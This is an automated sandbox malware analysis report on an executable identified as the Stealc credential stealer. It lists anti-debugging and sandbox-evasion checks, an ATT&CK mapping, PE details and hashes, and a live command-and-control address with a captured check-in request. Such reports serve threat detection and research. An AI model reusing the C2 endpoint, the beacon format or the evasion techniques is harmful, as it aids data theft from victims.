              Source: file.exe, 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000002.2087381883.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0S
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26052
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25897
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26044
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25917
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25941
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00304A60 VirtualProtect 00000000,00000004,00000100,?0_2_00304A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00326390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00326390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00326390 mov eax, dword ptr fs:[00000030h]0_2_00326390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00322A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00322A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3012, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00324610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00324610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003246A0
              Source: file.exe, file.exe, 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00322D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00321B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00321B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00322A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00322A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00322C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00322C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3012, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3012, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.phpKfile.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php)file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phpDfile.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.phpgfile.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1561849
                                Start date and time:2024-11-24 13:38:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 0s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 119
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.945718583925588
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'801'728 bytes
                                MD5:5ef73b409c0a81b7d80cce15a2e83ad9
                                SHA1:6ddd5bf03db3c5402469a7f3f443f27f2566ba3b
                                SHA256:005bb039d2c317340f5e0d3177d85559ccb63c3a722058833d824635069c4c4a
                                SHA512:188948d037cb8e875ef35d07783dfb485e8a88d2d5e3ceda4cb38d1ee2a7e37a21b5036faad12fb3a63cb10667b0c0caa2d0b04d2a5de25a0fc38ce05ee73a79
                                SSDEEP:24576:2y8p41cCNb6lw0TEGTZ7rAP7GzOEzlYXeEUA/sCoLkxcln5rwrl3chMd8sNq9YX8:2Q1cI64GTZ7cTGznBaeBaxU5Gci1fiP
                                TLSH:338533D31F434D22E54C0977A4ADE3990BFEC5186299CF63E1AA6D72D826BB015F2073
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xa93000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007FCE888F74BAh
                                subps xmm3, dqword ptr [ebx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [0000000Ah], al
                                add byte ptr [eax], al
                                add byte ptr [eax+75h], ah
                                xchg eax, esi
                                push cs
                                mov ah, 90h
                                xchg eax, esi
                                sldt word ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add eax, 0000000Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add eax, 0000000Ah
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2490000x162005eb2b536b0ecb29a7ce8284c609515c4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x24a0000x2b00x200f502cb5fbeb4533addc947a9e49625f8False0.798828125data6.016924945463094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x24c0000x2a80000x20068ec52a2e8d66b0e87968f8ea09dc0ccunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                jerbjqqv0x4f40000x19e0000x19e0002d3da8c18befff84ed9b21c0048c8358False0.9945139124773551data7.954382672261457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                nuqdewfy0x6920000x10000x400f97370d004f0b84d663b3f86920ab09bFalse0.7841796875data6.070651437030384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x6930000x30000x2200f2a080261cca9440aafb375f1f551c48False0.06675091911764706DOS executable (COM)0.7724518532527349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0x691c080x256ASCII text, with CRLF line terminators0.5100334448160535

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-24T13:39:01.001087+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 24, 2024 13:38:58.943334103 CET4970480192.168.2.5185.215.113.206
                                Nov 24, 2024 13:38:59.063163042 CET8049704185.215.113.206192.168.2.5
                                Nov 24, 2024 13:38:59.063276052 CET4970480192.168.2.5185.215.113.206
                                Nov 24, 2024 13:38:59.066936970 CET4970480192.168.2.5185.215.113.206
                                Nov 24, 2024 13:38:59.186464071 CET8049704185.215.113.206192.168.2.5
                                Nov 24, 2024 13:39:00.520813942 CET8049704185.215.113.206192.168.2.5
                                Nov 24, 2024 13:39:00.520917892 CET4970480192.168.2.5185.215.113.206
                                Nov 24, 2024 13:39:00.524223089 CET4970480192.168.2.5185.215.113.206
                                Nov 24, 2024 13:39:00.643878937 CET8049704185.215.113.206192.168.2.5
                                Nov 24, 2024 13:39:01.001008987 CET8049704185.215.113.206192.168.2.5
                                Nov 24, 2024 13:39:01.001086950 CET4970480192.168.2.5185.215.113.206
                                Nov 24, 2024 13:39:02.759378910 CET4970480192.168.2.5185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549704185.215.113.206803012C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Nov 24, 2024 13:38:59.066936970 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Nov 24, 2024 13:39:00.520813942 CET203INHTTP/1.1 200 OK
                                Date: Sun, 24 Nov 2024 12:39:00 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Nov 24, 2024 13:39:00.524223089 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 32 38 34 38 44 46 41 39 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a
                                Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="hwid"972848DFA9442409657292------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build"mars------GDBKJDGIJECFIEBFIDHC--
                                Nov 24, 2024 13:39:01.001008987 CET210INHTTP/1.1 200 OK
                                Date: Sun, 24 Nov 2024 12:39:00 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:07:38:55
                                Start date:24/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x300000
                                File size:1'801'728 bytes
                                MD5 hash:5EF73B409C0A81B7D80CCE15A2E83AD9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.5%
                                  Total number of Nodes:1409
                                  Total number of Limit Nodes:28
